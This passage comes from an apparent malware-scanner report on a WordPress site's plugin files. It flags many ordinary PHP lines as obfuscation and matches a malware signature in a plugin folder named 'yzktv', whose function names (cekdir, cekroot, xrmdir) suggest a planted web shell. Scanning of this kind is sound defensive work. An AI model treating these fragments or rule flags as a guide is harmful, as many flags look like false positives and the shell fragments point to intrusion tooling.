<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'apache_get_modules'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_message</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">'updated'</span><span style="color: #007700">, </span><span style="color: #0000BB">$id </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 307</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_messages</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 312</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div id="message" class="' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'type'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'"><p>' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'</p></div>'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_styles</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_settings_link</span><span style="color: #007700">(</span><span style="color: #0000BB">$links</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$links</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_dir</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uploads_dir</span><span style="color: #007700">[</span><span style="color: #DD0000">'basedir'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_url</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uploads_dir</span><span style="color: #007700">[</span><span style="color: #DD0000">'baseurl'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_subdirectories</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$subs</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_form</span><span style="color: #007700">(</span><span style="color: #0000BB">$form</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 89</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_htaccess_identifier</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"[plugin_name=" </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name </span><span style="color: #007700">. </span><span style="color: #DD0000">"]"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 94</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_index</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_385").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/yzktv/admin/views/protect-uploads-admin-settings-page.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.62 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_386" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code </span><span style="color: #007700">(</span><span style="color: #0000BB">Forbidden Access</span><span style="color: #007700">).</span><span style="color: #DD0000">', $this->plugin_name); ?></p> </label><br /> } ?> <!-- --> if ( $this->check_protective_file_removable() && $this->check_uploads_is_protected() ) { ?> <label for="protection_3"> <input type="radio" value="remove" nam</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code </span><span style="color: #007700">(</span><span style="color: #0000BB">Forbidden Access</span><span style="color: #007700">).</span><span style="color: #DD0000">', $this->plugin_name); ?></p></span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_386").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/yzktv/uninstall.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.27 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_387" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$plugin_name </span><span style="color: #007700">= </span><span style="color: #DD0000">'protect-uploads'</span><span style="color: #007700">; if( </span><span style="color: #0000BB">is_admin</span><span style="color: #007700">()) </span><span style="color: #0000BB">delete_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin_name </span><span style="color: #007700">. </span><span style="color: #DD0000">'-protection' </span><span style="color: #007700">); } } </span><span style="color: #0000BB">Alti_ProtectUploads_Uninstall</span><span style="color: #007700">::</span><span style="color: #0000BB">run</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_387").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/yzktv/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.19 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_388" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">; } </span><span style="color: #0000BB">?></span> </div> </body> </html></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 376</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">");</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">author</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekdir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 400</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='writable'>writable</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 402</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='readonly'>readonly</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekroot</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xrmdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">green</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">red</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 742</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">statusnya</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_388").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/vc_templates/ult_tab_element.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 21.67 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_389" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$dhfont_family </span><span style="color: #007700">= </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_tab_element_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'desc_font_family'</span><span style="color: #007700">] ); if ( </span><span style="color: #DD0000">'' </span><span style="color: #007700">!= </span><span style="color: #0000BB">$dhfont_family </span><span style="color: #007700">) { </span><span style="color: #0000BB">$contain_bg </span><span style="color: #007700">.= </span><span style="color: #DD0000">'font-family:' </span><span style="color: #007700">. </span><span style="color: #0000BB">$dhfont_family </span><span style="color: #007700">. </span><span style="color: #DD0000">';'</span><span style="color: #007700">; } } if ( </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_style' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 98</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_389").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/vc_templates/single_tab.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.56 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_390" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_390").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_cat_grid.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.26 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_391" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div class="woocommerce columns-' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_woocomposer_cat_grid_shortcode</span><span style="color: #007700">[</span><span style="color: #DD0000">'columns'</span><span style="color: #007700">] ) . </span><span style="color: #DD0000">'">' </span><span style="color: #007700">. </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">() . </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_VC_Addons_WooComposer_Cat_Grid</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs Cat Grid View</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer init Cat grid</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check </span><span style="color: #007700">*/</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">woocomposer grid shortcode</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 293</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_grid_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_init_grid</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div class="woocommerce columns-' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_woocomposer_cat_grid_shortcode</span><span style="color: #007700">[</span><span style="color: #DD0000">'columns'</span><span style="color: #007700">] ) . </span><span style="color: #DD0000">'">' </span><span style="color: #007700">. </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">() . </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">;</span>
</span>
